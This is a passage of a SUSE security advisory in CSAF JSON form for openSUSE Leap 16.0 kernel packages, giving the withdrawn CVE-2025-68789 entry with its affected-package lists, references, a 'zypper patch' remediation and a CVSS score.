"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68788"
},
{
"cve": "CVE-2025-68789",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68789"
}
],
"notes": [
{
"category": "general",
"text": "This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68789",
"url": "https://www.suse.com/security/cve/CVE-2025-68789"
},
{
"category": "external",
"summary": "SUSE Bug 1256781 for CVE-2025-68789",
"url": "https://bugzilla.suse.com/1256781"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
